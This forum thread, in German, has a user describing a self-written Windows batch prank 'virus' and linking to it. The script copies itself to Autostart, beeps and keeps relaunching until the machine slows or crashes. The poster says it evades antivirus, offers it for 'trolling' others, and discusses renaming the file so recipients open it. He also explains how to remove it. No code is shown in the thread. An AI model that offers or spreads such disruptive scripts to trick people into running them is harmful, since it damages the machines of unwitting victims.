Jump to content

Kleiner Virus auf Batch

MWojt
 Share

Recommended Posts

Hi Leute,

ich habe mal aus purer Langeweile einen Virus auf Batch geschrieben. Dieser macht nichts weiter, als sich selbst ins Autostart-Verzeichnis zu kopieren, einen Piepton von sich zu geben und dann sich selbst erneut zu öffnen, wodurch eine Art Dauerschleife entsteht.

Daten werden nicht direkt angegriffen, es ist halt nur so, dass der Computer wegen der Überlastung durch die sich ständig neu öffnenden Fenster immer langsamer wird, bis er vermutlich abstürzt.

Durch seine Primitivität wird es kein Virenprogramm als Virus erkennen. Außerdem sieht man an diesem Skript, wie anfällig Windows für Angriffe ist.

Beheben kann man das Ganze, indem man sich entweder als jemand anders einloggt und die Datei aus dem Autostart-Ordner des Benutzers, der den Virus ausgeführt hat, entfernt oder während des Starts die Leertaste vergewaltigt und in den abgesicherten Modus geht, um die Datei dort zu löschen.

Ich übernehme keinerlei Haftung für eventuelle Schäden, die durch dieses Skript entstehen. Nutzung auf eigene Gefahr!

Dieses Skript ist ausschließlich zum Trollen gedacht, nicht um irgenjemanden zu erpressen, oder so.

Da es vermutlich viel zu viele nach dem Download aus Gewohnheit einfach öffnen würden, habe ich es nicht als Batch-Datei, sondern als Text-Datei verlinkt.

Link: Link entfernt ~Baustein

PS: Das Kopieren in das Autostart-Verzeichnis ist nicht getestet worden.

Viel Spaß beim Trollen,

MWojt

//EDIT:

Ich habe die Funktion, dass sich das Programm in den Autostart kopiert, rausgenommen. Dadurch ist der Computer nach einem Neustart wieder benutzbar. Link:https://dl.dropboxusercontent.com/u/49971344/virus.txt

Hoffentlich reich das, um nicht wieder von Baustein gestriket zu werden

//EDIT 2:

Achtung: Das Skript funktioniert so nicht, wie mir soeben aufgefallen ist. Ihr müsst die Datei bearbeiten und hinter "start" den Namen der Datei schreiben. Ich habe zwar eine Idee, wie es besser ginge, allerdings fehlt mir dazu gerade die Lust :P

Edited by MWojt

Stimmt, das ist dumm. Ich meine, wer schickt jemandem eine Datei namens "virus.cmd" und erwartet ernsthaft, dass dieser jemand die Datei dann öffnet ... Ich hab's mal geändert

Edited by MWojt